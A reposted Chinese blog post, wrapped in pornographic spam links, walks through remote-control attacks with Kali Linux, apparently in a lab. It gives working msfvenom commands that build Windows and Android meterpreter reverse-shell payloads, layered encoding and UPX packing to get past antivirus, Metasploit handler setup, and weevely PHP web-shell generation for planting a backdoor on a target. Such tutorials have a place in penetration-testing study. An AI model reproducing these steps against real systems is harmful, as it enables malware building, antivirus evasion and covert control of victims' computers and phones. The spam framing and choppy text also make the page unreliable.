亚洲一级簧片_性 毛片_国产乱子视频_久久影城_强伦女教师视频_成人精品久久

win10電腦遠程控制

發布時間: 2023-04-15 21:49 閱讀: 文章來源:轉載

1生成被控端2、啟動主控端3、

Netcat 瑞士軍刀

掃描端口

建立連接

掃描某IP地址的指定端口

nc -v ip port

連接指定IP地址的指定端口的命令如下

nc ip port

以靶機Metasploitable 2的80端口為例測試

控制軟件如果是正向的,受害者計算機執行遠程控制被控端之后,會在自己主機上打開一個端口,等待hacker連接,受害者計算機不會主動通知計算機,因此hacker必須知道計算機A的IP地址

控制軟件如果是反向的,受害者計算機執行遠程控制被控端之后,會主動通知hacker,因此黑客無須知道受害者計算機的IP地址,目前主要使用的方式

1、如何使用MSFPC生成被控端 linux

各種類型的被控端

生成linux的被控端,IP選擇本機的etho網卡

運行run,很快就建好了一個handler,這就是對應被控終端的主控端

2、如何在kali linux2 中生成被控端

msfpc 是MSFvenom的優化版

┌──(rootkali)-[~]

└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 354 bytes

Final size of exe file: 73802 bytes

Saved as: /var/payload.exe

這里我們使用msfvenom命令生成一個被控端,使用的被控端就是一個用于windows操作系統的反向遠程控制軟件,即windows/meterpreter/reverse_tcp lhost=192.168.8.128是所使用的的kalilinux的虛擬機IP地址

使用以下命令可以查看所有可以使用的攻擊載荷

name攻擊載荷的名稱 操作系統+控制方式+模塊

查找Metasploit 可以在Android操作系統下運行的meterpreter

查看攻擊載荷需要設置的參數

msfvenom --list-options -p windows/meterpreter/reverse_tcp

2、如何在kali linux2中啟動主控端

輸入msfconsole啟動metasploit

在metasploit中使用handler作為主控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /root/payload.exe

3、遠程控制被控端與殺毒軟件的博弈

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe

消除payload.exe的特征碼,msf編碼器可以將原可執行程傳重新編碼,生成一個新的二進制文件,這個文件執行后,msf編碼器會將原可執行程序解碼到內存中并執行

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/nonalpha -f c

-e 選擇的編碼器,使用 x86/nonalpha編寫方式的到的shellcode如圖所示

x86/shikata_ga_nai 兩次生成的shellcode雖然功能相同,但是代碼已經不同了,這也是黑客鐘愛的編碼方式,可以進行多次編碼 -i 編碼次數

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f -raw | msfvenom -e x86/alpha_upper -a x86/countdown -a x86 --platform windows -i 10 -f exe -o /var/payload.exe

3.1 加殼也是對抗基于文件掃描和內存掃描的反病毒技術

加殼工具UPX

upx /var/payload.exe

3.2 powersploit免殺

4、Meterpreter在Android中的應用

4.1查找在Android運行的攻擊載荷

下面以 android/meterpreter/reverse_tcp 為例

msfvenom --list-options -p android/meterpreter/reverse_tcp

執行完畢后可以看到被控端的參數

測試環境

1、Android手機IP地址 192.168.1.101

2、kalilinux 安裝到虛擬機改用橋接模式 192.168.1.34

3、無線路由192.168.1.1

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=9999 R>/var/pentest.apk

這條命令執行完畢后就在var目錄生成了一個pentest.apk的文件

4、建立主控端

啟動Metasploit

msfconsole

5、對web實現遠程控制

中國菜刀 中國蟻劍 冰蝎 weevely(生成PHP木馬)

weevely generate 123456 /home/kali/Downloads/testweb.php

password 是生成木馬的密碼 path是路徑 filename 文件名

把后門傳到靶機里

???展開全文
相關文章
主站蜘蛛池模板: 日韩一区二区三区在线视频 | 91成人在线播放 | 国产精彩视频在线 | 国产一区二区三区久久 | 日韩免费福利视频 | 偷拍自拍网站 | 亚洲第一免费播放区 | 欧美激情午夜 | av成人国产| 综合久久久久久久 | 不卡久久 | 日韩一区二区三区视频 | 丁香一区二区 | 少妇久久久久久久久久久 | 久久久97 | 欧美国产精品一区二区三区 | 激情视频网站 | 一区二区三区四区国产 | 正在播放国产一区 | 在线精品亚洲欧美日韩国产 | 国产精彩视频在线 | 一级在线视频 | 亚洲国产精品一区 | 国产成人精品免费视频大全最热 | 天天色综合天天色 | 亚洲视频第一页 | 日韩亚洲精品在线 | 久久久av| 成年人小视频 | 97欧美| 污视频网站在线免费观看 | 欧美成人一区二免费视频软件 | 亚洲激情视频在线播放 | 中文字幕在线视频一区 | 欧美激情第二页 | 国产精品成人免费视频 | 中文字幕欧美一区 | 日产精品久久久一区二区 | 99精品免费| 黄色小视频在线观看 | 国产免费小视频 |